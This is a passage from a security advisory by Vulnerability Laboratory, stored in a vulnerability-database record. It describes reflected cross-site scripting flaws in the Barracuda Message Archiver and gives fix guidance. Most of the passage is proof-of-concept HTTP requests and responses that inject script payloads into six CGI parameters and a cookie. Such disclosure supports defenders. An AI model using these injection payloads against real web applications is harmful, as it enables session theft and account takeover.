href=\"/cgi-mod/get_source.cgi?user=guest&locale=en_US&realm=&password=506b7912f7dc85d2feb3663f1ee4a1a6&et=138062631262863\"\r\nstyle=\"behavior:url(#default#time2)\"onbegin=\"alert(1)\"d9b8f60df30&id=0|\r\nd/5a/8ccfc64729eba580e2c95995d53b8.0_492&id_hash=fa601415b5fa922e38d90c5f2ea1ad94&machine=&primary_tab=BASIC&\r\nsecondary_tab=archive_searchea120\"><script>alert(/POC2/)\r\n</script>9335e4791a6&file=0|d/5a/8ccfc64729eba580e2c95995d53b8.0_492&download=1&email=guest\">Download</a></td>\r\n<td height=5 width=3 class=message_detail> </td>\r\n</tr>\r\n<tr>\r\n\r\n\r\nPOC HTTP Requests:\r\nRequest #1 (et):\r\nGET /cgi-mod/view_message_log_detail.cgi?user=guest&password=506b7912f7dc85d2feb3663f1ee4a1a6&et=13806263121c006\"><script>alert(1)\r\n</script>f8eb700f5ef&locale=en_US&realm=&auth_type=Local&policy_query=&primary_tab=BASIC&secondary_tab=archive_search&\r\nsearchid=1&action=readmessage&scrollbars=yes&resi\r\nzable=yes&id=0|d/5a/8ccfc64729eba580e2c95995d53b8.0_492 HTTP/1.1\r\nHost: archiver.ptest.cudasvc.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nDNT: 1\r\nReferer: https://archiver.ptest.cudasvc.com/cgi-mod/index.cgi?\r\n\r\nauth_type=Local&et=1380626293&locale=en_US&password=df3cbfe08d7159dc78964b40059f5075&primary_tab=BASIC&secondary_tab=archive_search&user=guest\r\nCookie: ys-folder_list=o%3Acollapsed%3Db%253A1\r\nConnection: keep-alive\r\n\r\n\r\n\r\nResponse #1\r\nHTTP/1.1 200 OK\r\nServer: BarracudaHTTP 4.0\r\nContent-Type: text/html; charset=utf-8\r\nConnection: keep-alive\r\nExpires: Mon, 01 Oct 2012 12:34:31 GMT\r\nDate: Tue, 01 Oct 2013 12:34:31 GMT\r\nContent-Length: 8431\r\n\r\n<html style=\"margin:0;padding:0;height:100%\"><head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"><title>BC_216.129.99.129</title>\r\n<link rel=\"stylesheet\" type=\"text/css\" href=\"/barr\r\n...\r\n<a href=\"/cgi-mod/get_source.cgi?user=guest&locale=en_US&realm=&password=506b7912f7dc85d2feb3663f1ee4a1a6&et=13806263121c006\"><script>alert(1)\r\n</script>f8eb700f5ef&id=0|\r\nd/5a/8ccfc64729eba580e2c95995d53b8.0_492&id_hash=fa601415b5fa922e38d90c5f2ea1ad94&machine=&primary_tab=BASIC&secondary_tab=archive_search&file=0|\r\nd/5a/8ccfc64729eba580e2c95995d53b8.0_492&download=\r\n\r\n\r\n\r\nRequest #2 (en_US)\r\nGET /cgi-mod/view_message_log_detail.cgi?user=guest&password=506b7912f7dc85d2feb3663f1ee4a1a6&et=1380626312&locale=en_USea120\"><script>alert(1)\r\n\r\n</script>9335e4791a6&realm=&auth_type=Local&policy_query=&primary_tab=BASIC&secondary_tab=archive_search&searchid=1&action=readmessage&\r\nscrollbars=yes&resizable=yes&id=\r\n\r\n0|d/5a/8ccfc64729eba580e2c95995d53b8.0_492 HTTP/1.1\r\nHost: archiver.ptest.cudasvc.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nDNT: 1\r\nReferer: https://archiver.ptest.cudasvc.com/cgi-mod/index.cgi?\r\n\r\nauth_type=Local&et=1380626293&locale=en_US&password=df3cbfe08d7159dc78964b40059f5075&primary_tab=BASIC&secondary_tab=archive_search&user=guest\r\nCookie: ys-folder_list=o%3Acollapsed%3Db%253A1\r\nConnection: keep-alive\r\n\r\n\r\nResponse #2\r\nHTTP/1.1 200 OK\r\nServer: BarracudaHTTP 4.0\r\nContent-Type: text/html; charset=utf-8\r\nConnection: keep-alive\r\nExpires: Sun, 02 Oct 2011 12:36:25 GMT\r\nDate: Tue, 01 Oct 2013 12:36:25 GMT\r\nContent-Length: 177\r\n\r\n<html><body onLoad=\"window.parent.location='/cgi-mod/index.cgi?error=3&secondary_tab=archive_search&locale=en_USea120\"><script>alert(1)\r\n\r\n</script>9335e4791a6'\"> </body></html>\r\n\r\n\r\nRequest #3 (password)\r\nGET /cgi-mod/view_message_log_detail.cgi?user=guest&password=506b7912f7dc85d2feb3663f1ee4a1a66f1ff\"><script>alert(1)</script>e2b3b338db0&\r\net=13806263121c006%22%3E\r\n%3Cscript%3Ealert(1)%3C/script\r\n%3Ef8eb700f5ef&locale=en_US&realm=&auth_type=Local&policy_query=&primary_tab=BASIC&secondary_tab=archive_search&searchid=1&\r\naction=readmessage&scrollbars=yes&resizable=\r\n\r\nyes&id=0|d/5a/8ccfc64729eba580e2c95995d53b8.0_492 HTTP/1.1\r\nHost: archiver.ptest.cudasvc.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nDNT: 1\r\nCookie: ys-folder_list=javascript%3Aalert%282%29; \r\nys-details_south=o%3Acollapsed%3Db%253A1; \r\nys-details_east=o%3Acollapsed%3Db%253A0; \r\nys-details_west=o%3Acollapsed%3Db\r\n%253A1\r\n\r\n\r\nResponse #3\r\nHTTP/1.1 200 OK\r\nServer: BarracudaHTTP 4.0\r\nContent-Type: text/html; charset=utf-8\r\nConnection: keep-alive\r\nExpires: Mon, 01 Oct 2012 18:23:09 GMT\r\nDate: Tue, 01 Oct 2013 18:23:09 GMT\r\nContent-Length: 8474\r\n\r\n<html style=\"margin:0;padding:0;height:100%\"><head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"><title>BC_216.129.99.129</title>\r\n<link rel=\"stylesheet\" type=\"text/css\" href=\"/barr\r\n...\r\n<a href=\"/cgi-mod/get_source.cgi?user=guest&locale=en_US&realm=&password=506b7912f7dc85d2feb3663f1ee4a1a66f1ff\"><script>alert(1)\r\n</script>e2b3b338db0&et=13806263121c006\">\r\n...\r\n\r\n\r\nRequest #4 (primary_tab)\r\nGET /cgi-mod/view_message_log_detail.cgi?user=guest&password=506b7912f7dc85d2feb3663f1ee4a1a6&et=13806263121c006%22%3E%3Cscript%3Ealert(1)%3C/script\r\n%3Ef8eb700f5ef&locale=en_US&realm=&auth_type=Local&policy_query=&primary_tab=BASIC2cc86<script>alert(1)\r\n\r\n</script>4b6dfc58551&secondary_tab=archive_search&searchid=1&action=readmessage&scrollbars=yes&resizable=yes&id=0|d/5a/8ccfc64729eba580e2c95995d53b8.0_492 HTTP/1.1\r\nHost: archiver.ptest.cudasvc.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nDNT: 1\r\nCookie: ys-folder_list=javascript%3Aalert%282%29; \r\nys-details_south=o%3Acollapsed%3Db%253A1; \r\nys-details_east=o%3Acollapsed%3Db%253A0; \r\nys-details_west=o%3Acollapsed%3Db\r\n%253A1\r\nConnection: keep-alive\r\n\r\n\r\nResponse #4\r\nHTTP/1.1 200 OK\r\nServer: BarracudaHTTP 4.0\r\nContent-Type: text/html; charset=utf-8\r\nConnection: keep-alive\r\nExpires: Mon, 01 Oct 2012 18:40:02 GMT\r\nDate: Tue, 01 Oct 2013 18:40:02 GMT\r\nContent-Length: 8525\r\n\r\n<html style=\"margin:0;padding:0;height:100%\"><head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"><title>BC_216.129.99.129</title>\r\n<link rel=\"stylesheet\" type=\"text/css\" href=\"/barr\r\n...\r\n</script>f8eb700f5ef&id=0|d/5a/8ccfc64729eba580e2c95995d53b8.0_492&id_hash=fa601415b5fa922e38d90c5f2ea1ad94&machine=&primary_tab=BASIC2cc86<script>alert(1)\r\n\r\n</script>4b6dfc58551&secondary_tab=archive_search&file=0|d/5a/8ccfc64729eba580e2c95995d53b8.0_492&download=1&email=guest\">\r\n...\r\n\r\n\r\nRequest #5 (realm)\r\nGET /cgi-mod/view_message_log_detail.cgi?user=guest&password=506b7912f7dc85d2feb3663f1ee4a1a6&et=13806263121c006%22%3E%3Cscript%3Ealert(1)%3C/script\r\n%3Ef8eb700f5ef&locale=en_US&realm=3111a\"><script>alert(1)\r\n</script>99f8452d662&auth_type=Local&policy_query=&primary_tab=BASIC&secondary_tab=archive_search&searchid=1&action=readmessage&scrollbars=yes&resizable=yes&id=0|\r\n\r\nd/5a/8ccfc64729eba580e2c95995d53b8.0_492 HTTP/1.1\r\nHost: archiver.ptest.cudasvc.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nDNT: 1\r\nCookie: ys-folder_list=javascript%3Aalert%282%29; \r\nys-details_south=o%3Acollapsed%3Db%253A1; \r\nys-details_east=o%3Acollapsed%3Db%253A0; \r\nys-details_west=o%3Acollapsed%3Db\r\n%253A1\r\nConnection: keep-alive\r\n\r\n\r\nResponse #5\r\nHTTP/1.1 200 OK\r\nServer: BarracudaHTTP 4.0\r\nContent-Type: text/html; charset=utf-8\r\nConnection: keep-alive\r\nExpires: Mon, 01 Oct 2012 18:33:27 GMT\r\nDate: Tue, 01 Oct 2013 18:33:27 GMT\r\nContent-Length: 8474\r\n\r\n<html style=\"margin:0;padding:0;height:100%\"><head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"><title>BC_216.129.99.129</title>\r\n<link rel=\"stylesheet\" type=\"text/css\" href=\"/barr\r\n...\r\n<a href=\"/cgi-mod/get_source.cgi?user=guest&locale=en_US&realm=3111a\"><script>alert(1)\r\n</script>99f8452d662&password=506b7912f7dc85d2feb3663f1ee4a1a6&et=13806263121c006\">\r\n...\r\n\r\n\r\nRequest #6 (secondary_tab)\r\nGET /cgi-mod/view_message_log_detail.cgi?\r\n\r\nuser=guest&password=506b7912f7dc85d2feb3663f1ee4a1a6&et=1380626312&locale=en_US&realm=&auth_type=Local&policy_query=&\r\nprimary_tab=BASIC&secondary_tab=archive_searchfd89\r\n\r\n2\"><script>alert(1)</script>4fee14c256a&searchid=1&action=readmessage&scrollbars=yes&resizable=yes\r\n&id=0|d/5a/8ccfc64729eba580e2c95995d53b8.0_492 HTTP/1.1\r\nHost: archiver.ptest.cudasvc.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nDNT: 1\r\nReferer: https://archiver.ptest.cudasvc.com/cgi-mod/index.cgi?\r\n\r\nauth_type=Local&et=1380626293&locale=en_US&password=df3cbfe08d7159dc78964b40059f5075&primary_tab=BASIC&secondary_tab=archive_search&user=guest\r\nCookie: ys-folder_list=o%3Acollapsed%3Db%253A1\r\nConnection: keep-alive\r\n\r\n\r\nResponse #6 \r\nHTTP/1.1 200 OK\r\nServer: BarracudaHTTP 4.0\r\nContent-Type: text/html; charset=utf-8\r\nConnection: keep-alive\r\nExpires: Sun, 02 Oct 2011 12:43:18 GMT\r\nDate: Tue, 01 Oct 2013 12:43:18 GMT\r\nContent-Length: 177\r\n\r\n<html><body onLoad=\"window.parent.location='/cgi-mod/index.cgi?error=3&secondary_tab=archive_searchfd892\"><script>alert(1)\r\n\r\n</script>4fee14c256a&locale=en_US'\"> </body></html>\r\n\r\n\r\n\r\n\r\nSolution - Fix & Patch:\r\n=======================\r\n1. Parse the view_message_log_details.cgi input and encode the attached vulnerable parameters.\r\n2. Parse the vulnerable output parameters in the get_source.cgi and index.cgi files\r\n3. Restrict the input parameters and connect it with the regular appliance model filter mechanism\r\n\r\n\t\t\t\t[+] /cgi-mod/view_message_log_detail.cgi\r\n\t\t\t\t[+] /cgi-mod/get_source.cgi\r\n\t\t\t\t[+] /cgi-mod/index.cgi\r\n\r\n\t\t\t\t[+] /cgi-mod/view_message_log_detail.cgi [et parameter]\r\n\t\t\t\t[+] /cgi-mod/view_message_log_detail.cgi [locale parameter]\r\n\t\t\t\t[+] /cgi-mod/view_message_log_detail.cgi [password parameter]\r\n\t\t\t\t[+] /cgi-mod/view_message_log_detail.cgi [primary_tab parameter]\r\n\t\t\t\t[+] /cgi-mod/view_message_log_detail.cgi [realm parameter]\r\n\t\t\t\t[+] /cgi-mod/view_message_log_detail.cgi [secondary_tab parameter]\r\n\r\n\r\nSecurity Risk:\r\n==============\r\nThe security risk of the client-side cross site scripting web vulnerabilities are estimated as medium. (CVSS 3.0)\r\n\r\nNote: The vulnerability has been patched by the barracuda networks security team. Te patches are already available in the customer section of the service portal.\r\n\r\n\r\nCredits & Authors:\r\n==================\r\nVulnerability Laboratory [Research Team] - Ateeq Khan (ateeq@evolution-sec.com) [www.vulnerability-lab.com]\r\n\r\n\r\nDisclaimer & Information:\r\n=========================\r\nThe information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed \r\nor implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable \r\nin any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab \r\nor its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for \r\nconsequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, \r\npolicies, deface websites, hack into databases or trade with fraud/stolen material.\r\n\r\nDomains: www.vulnerability-lab.com \t- www.vuln-lab.com\t\t\t \t\t- www.evolution-sec.com\r\nContact: admin@vulnerability-lab.com \t- research@vulnerability-lab.com \t \t\t- admin@evolution-sec.com\r\nSection: magazine.vulnerability-db.com\t- vulnerability-lab.com/contact.php\t\t \t- evolution-sec.com/contact\r\nSocial:\t twitter.com/#!/vuln_lab \t\t- facebook.com/VulnerabilityLab \t \t\t- youtube.com/user/vulnerability0lab\r\nFeeds:\t vulnerability-lab.com/rss/rss.php\t- vulnerability-lab.com/rss/rss_upcoming.php \t\t- vulnerability-lab.com/rss/rss_news.php\r\nPrograms: vulnerability-lab.com/submit.php \t- vulnerability-lab.com/list-of-bug-bounty-programs.php\t- vulnerability-lab.com/register/\r\n\r\nAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to \r\nelectronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by \r\nVulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website \r\nis trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact \r\n(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.\r\n\r\n\t\t\t\tCopyright \u00a9 2015 | Vulnerability Laboratory - [Evolution Security GmbH]\u2122\r\n\r\n\r\n\r\n", "description": "", "reporter": "Vulnerability Laboratory [Research Team] - Ateeq Khan (ateeq@evolution-sec.com) [www.vulnerability-lab.com]", "href": "http://www.vulnerability-lab.com/get_content.php?id=1108", "type": "vulnerlab", "viewCount": 5, "references": [], "lastseen": "2019-07-10T14:58:33", "published": "2016-01-08T00:00:00", "cvelist": [], "id": "VULNERLAB:1108", "modified": "2016-01-08T00:00:00", "title": "Barracuda #38 Message Archiver - Multiple Vulnerabilities", "edition": 2, "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"dependencies": {"references": [], "modified": "2019-07-10T14:58:33", "rev": 2}, "score": {"value": 0.3, "vector": "NONE", "modified": "2019-07-10T14:58:33", "rev": 2}, "vulnersScore": 0.3}, "scheme": null, "immutableFields": []}